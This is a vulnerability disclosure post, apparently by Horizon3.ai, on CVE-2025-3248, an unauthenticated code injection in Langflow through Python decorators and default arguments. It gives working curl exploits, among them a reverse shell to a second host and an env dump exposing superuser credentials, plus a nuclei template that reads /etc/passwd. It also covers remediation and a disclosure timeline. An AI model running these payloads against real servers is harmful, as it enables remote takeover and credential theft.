TL;DR
We discovered an interesting code injection vulnerability, CVE-2025-3248, in Langflow, a popular tool used for building agentic AI workflows. This vulnerability is easily exploitable and enables unauthenticated remote attackers to fully compromise Langflow servers. The issue is patched in Langflow 1.3.0, and we encourage all users to upgrade to the latest version.
Note: We are choosing to publish full details now since an exploit has already been published for this vulnerability.
Background
“Agentic AI” is everywhere these days, and a vibrant ecosystem of AI tools has sprouted up around it. One of the more popular tools out there is Langflow, an open source project with 50K+ GitHub stars that is backed by DataStax and IBM.
Langflow is a Python based web application that provides a visual interface to build AI-driven agents and workflows.

There have been a few critical security vulnerabilities (CVE-2024-7297, CVE-2024-48061, CVE-2024-42835, CVE-2024-37014) reported in the past against Langflow, but these CVEs look questionable. Langflow provides “remote code execution as a feature” to any authenticated user because it allows users to modify and execute the Python code backing its visual components. It also by design does not support a sandbox for code execution. These CVEs seem to assume that Langflow has been configured without authentication or an attacker already has credentials.
We wanted to see what was possible as an unauthenticated attacker if Langflow is configured with authentication enabled, as most instances exposed to the Internet are.
A Bad Code Smell
Within a few minutes of looking at the source code, we identified something fishy – an unauthenticated API endpoint /api/v1/validate/code
running Python exec
on untrusted user input.
https://github.com/langflow-ai/langflow/blob/1.2.0/src/backend/base/langflow/utils/validate.py

But how does one actually exploit this? This isn’t a straight exec
on user input.
The code uses the ast
module to parse user input and extracts any ast.Import
and ast.FunctionDef
nodes, i.e. any Python import
statements and function definitions.
Imports are validated using importlib.import_module
. This can’t be directly exploited unless an attacker can first upload an arbitrary Python file onto the file system within Python’s module search path. We didn’t find a way to do this.
Function definitions are validated using compile
and exec
. A function definition is not the same as a function though. Executing a function definition only makes the function available for execution within the current Python namespace; it doesn’t actually execute the function code. We tried polluting the current namespace by overwriting existing global and local function names but weren’t successful. Digging deeper…
Diving into Python Decorators
What exactly is an ast.FunctionDef
? In Python, function definitions also include the decorators attached to the function.

If you’ve worked with Python long enough, you’re probably familiar with decorators. Decorators are functions that return functions that wrap other functions. In Python web apps, they’re commonly used to implement authentication/authorization controls, such as @login_required
. Here’s a simple example:
# A simple decorator function
def decorator(func):
def wrapper():
print("Before calling the function.")
func()
print("After calling the function.")
return wrapper
# Applying the decorator to a function
@decorator
def greet():
print("Hello, World!")
greet()
Calling greet
here is equivalent to calling the wrapper
function returned by decorator
and results in the following output:
Before calling the function.
Hello, World!
After calling the function.
But decorators don’t have to be functions or return functions. Decorators are actually modeled as expressions – arbitrary Python code statements.
Let’s say you have a file called foomodule.py
with the following code:
@__import__("os").system("echo Inside foo decorator")
def foo():
print("Inside foo function")
And in the same directory another file main.py
with just the following line:import foomodule
And then you run python main.py
:

The import of foomodule
in main.py
executes the function definition of foo
, which executes the decorator, which in turn runs os.system("echo Inside foo decorator")
, resulting in the output Inside foo decorator
. The foo
function itself is never called, as expected.
Abusing Decorators for Remote Code Execution
Remote code execution is easy now – just stick the payload into a decorator. Here’s an example of landing a Python reverse shell, targeting a vulnerable host at 10.0.220.200.
curl -X POST -H 'Content-Type: application/json' http://10.0.220.200:8000/api/v1/validate/code -d '{"code": "@exec(\"import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"10.0.220.201\\\",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\\\"/bin/sh\\\")\")\ndef foo():\n pass"}'

Interactive RCE
Interactive RCE is possible by raising an Exception from the decorator. For instance the following will execute the env
command and return the username and password of the Langflow superuser, assuming Langflow has been set up with authentication enabled:
curl -X POST -H 'Content-Type: application/json' http://10.0.220.200:8000/api/v1/validate/code -d '{"code": "@exec(\"raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"env\\\"))\")\ndef foo():\n pass"}'

Another Path to RCE: Python Default Arguments
After the CVE was published, another researcher published a POC that abused another feature of Python functions: default arguments. These are also modeled as expressions in Python and get executed when a function is defined.

So just as well, you can stick your payload into the default argument for a function:
curl -H 'Content-Type: application/json' http://10.0.220.200:8000/api/v1/validate/code -d '{"code":"def foo(cmd=exec(\"raise Exception(__import__(\\\"subprocess\\\").check_output(\\\"env\\\"))\")):\n pass"}'

Detection
Here’s a nuclei template that uses the interactive RCE to grab the /etc/passwd
file on a vulnerable Langflow server:
id: CVE-2025-3248
info:
name: Langflow RCE
author: nvn1729
severity: critical
description: This template exploits an unauth RCE in Langflow
tags: python,injection,vulnerability,cve
requests:
- raw:
- |
POST /api/v1/validate/code HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"code": "@exec('raise Exception(__import__(\"subprocess\").check_output([\"cat\", \"/etc/passwd\"]))')\ndef foo():\n pass"}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
Remediation
We urge all users of Langflow to upgrade to at least version 1.3.0 or restrict network access to it. As of this writing, there are 500+ exposed instances of Langflow on the Internet, according to Censys.
The vulnerable code is present in the earliest versions of Langflow dating back two years, and from our testing it appears most, if not all, versions prior to 1.3.0 are exploitable. The patch puts the vulnerable endpoint behind authentication. Technically this vulnerability can still be exploited to escalate privileges from a regular user to a Langflow superuser, but that is already possible without this vulnerability too. We’re not really clear why Langflow distinguishes between superusers and regular users when all regular users can execute code on the server by design.
As a general practice we recommend caution when exposing any recently developed AI tools to the Internet. If you must expose it externally, consider putting it an isolated VPC and/or behind SSO. It only takes one errant/shadow IT deployment of these tools on some cloud instance to have a breach on your hands.
Timeline
- Feb. 22, 2025: Horizon3.ai reports issue to Langflow using GitHub security issue
- Feb. 24, 2025: Horizon3.ai raises regular GitHub issue asking maintainers to look at GitHub security issue
- Feb. 25, 2025: Horizon3.ai raises issue to DataStax through HackerOne as a fallback
- Feb. 26, 2025: Horizon3.ai raises issue to DataStax over email. DataStax acknowledges and says there will be an update on the GitHub security issue.
- Feb. 28, 2025: Support for exploit added to Horizon3’s NodeZero product
- Mar. 3, 2025: With no update on the GitHub security issue, Horizon3.ai follows up again with DataStax.
- Mar. 4, 2025: Pull request created to fix the issue.
- Mar. 5, 2025: PR merged
- Mar. 10, 2025: Horizon3.ai requests CVE from MITRE
- Mar. 17, 2025: HackerOne triages issues (already fixed at this point)
- Mar. 31, 2025: Langflow 1.3.0 released
- Apr 1, 2025: Horizon3.ai follows up with MITRE for CVE
- Apr. 2, 2025: Horizon3.ai requests CVE from VulnCheck
- Apr. 3, 2025: VulnCheck assigns CVE-2025-3248
- Apr. 7, 2025: CVE-2025-3248 published, Horizon3.ai asks MITRE to cancel original CVE request
- Apr. 9, 2025: Third-party publishes exploit
- Apr. 9, 2025: This post
Shout out to VulnCheck for their timely response in getting a CVE assigned.
As usual, as with any zero-day, Horizon3’s NodeZero product had coverage for this vulnerability shortly after it was reported to the vendor.
References
- https://github.com/langflow-ai/langflow/releases/tag/1.3.0
- https://github.com/langflow-ai/langflow/pull/6911
- https://www.cve.org/cverecord?id=CVE-2025-3248